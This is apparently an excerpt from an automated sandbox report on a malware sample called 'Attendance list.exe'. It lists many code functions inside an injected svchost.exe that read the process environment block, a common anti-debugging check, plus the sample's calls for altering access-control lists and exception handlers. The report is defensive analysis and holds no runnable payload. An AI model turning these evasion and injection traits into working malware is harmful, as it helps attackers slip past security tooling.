            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362826B mov eax, dword ptr fs:[00000030h]2_2_0362826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov eax, dword ptr fs:[00000030h]2_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov ecx, dword ptr fs:[00000030h]2_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370625D mov eax, dword ptr fs:[00000030h]2_2_0370625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A250 mov eax, dword ptr fs:[00000030h]2_2_0362A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636259 mov eax, dword ptr fs:[00000030h]2_2_03636259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362823B mov eax, dword ptr fs:[00000030h]2_2_0362823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037062D6 mov eax, dword ptr fs:[00000030h]2_2_037062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h]2_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h]2_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov ecx, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov ecx, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C156 mov eax, dword ptr fs:[00000030h]2_2_0362C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C8158 mov eax, dword ptr fs:[00000030h]2_2_036C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660124 mov eax, dword ptr fs:[00000030h]2_2_03660124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov ecx, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F0115 mov eax, dword ptr fs:[00000030h]2_2_036F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037061E5 mov eax, dword ptr fs:[00000030h]2_2_037061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036601F8 mov eax, dword ptr fs:[00000030h]2_2_036601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03670185 mov eax, dword ptr fs:[00000030h]2_2_03670185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C073 mov eax, dword ptr fs:[00000030h]2_2_0365C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632050 mov eax, dword ptr fs:[00000030h]2_2_03632050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6050 mov eax, dword ptr fs:[00000030h]2_2_036B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A020 mov eax, dword ptr fs:[00000030h]2_2_0362A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C020 mov eax, dword ptr fs:[00000030h]2_2_0362C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6030 mov eax, dword ptr fs:[00000030h]2_2_036C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4000 mov ecx, dword ptr fs:[00000030h]2_2_036B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0362A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036380E9 mov eax, dword ptr fs:[00000030h]2_2_036380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B60E0 mov eax, dword ptr fs:[00000030h]2_2_036B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C0F0 mov eax, dword ptr fs:[00000030h]2_2_0362C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036720F0 mov ecx, dword ptr fs:[00000030h]2_2_036720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B20DE mov eax, dword ptr fs:[00000030h]2_2_036B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036280A0 mov eax, dword ptr fs:[00000030h]2_2_036280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C80A8 mov eax, dword ptr fs:[00000030h]2_2_036C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov eax, dword ptr fs:[00000030h]2_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov ecx, dword ptr fs:[00000030h]2_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363208A mov eax, dword ptr fs:[00000030h]2_2_0363208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638770 mov eax, dword ptr fs:[00000030h]2_2_03638770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov esi, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630750 mov eax, dword ptr fs:[00000030h]2_2_03630750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE75D mov eax, dword ptr fs:[00000030h]2_2_036BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4755 mov eax, dword ptr fs:[00000030h]2_2_036B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov ecx, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AC730 mov eax, dword ptr fs:[00000030h]2_2_036AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C700 mov eax, dword ptr fs:[00000030h]2_2_0366C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630710 mov eax, dword ptr fs:[00000030h]2_2_03630710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660710 mov eax, dword ptr fs:[00000030h]2_2_03660710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE7E1 mov eax, dword ptr fs:[00000030h]2_2_036BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C0 mov eax, dword ptr fs:[00000030h]2_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B07C3 mov eax, dword ptr fs:[00000030h]2_2_036B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036307AF mov eax, dword ptr fs:[00000030h]2_2_036307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E47A0 mov eax, dword ptr fs:[00000030h]2_2_036E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D678E mov eax, dword ptr fs:[00000030h]2_2_036D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03662674 mov eax, dword ptr fs:[00000030h]2_2_03662674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364C640 mov eax, dword ptr fs:[00000030h]2_2_0364C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E627 mov eax, dword ptr fs:[00000030h]2_2_0364E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03666620 mov eax, dword ptr fs:[00000030h]2_2_03666620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668620 mov eax, dword ptr fs:[00000030h]2_2_03668620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363262C mov eax, dword ptr fs:[00000030h]2_2_0363262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE609 mov eax, dword ptr fs:[00000030h]2_2_036AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672619 mov eax, dword ptr fs:[00000030h]2_2_03672619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov eax, dword ptr fs:[00000030h]2_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C6A6 mov eax, dword ptr fs:[00000030h]2_2_0366C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036666B0 mov eax, dword ptr fs:[00000030h]2_2_036666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6500 mov eax, dword ptr fs:[00000030h]2_2_036C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Users\user\Desktop\Attendance list.exe Code function: 0_2_009181F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_009181F7
            Source: C:\Users\user\Desktop\Attendance list.exe Code function: 0_2_008EA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_008EA395
            Source: C:\Users\user\Desktop\Attendance list.exe Code function: 0_2_008EA364 SetUnhandledExceptionFilter, 0_2_008EA364

            HIPS / PFW / Operating System Protection Evasion

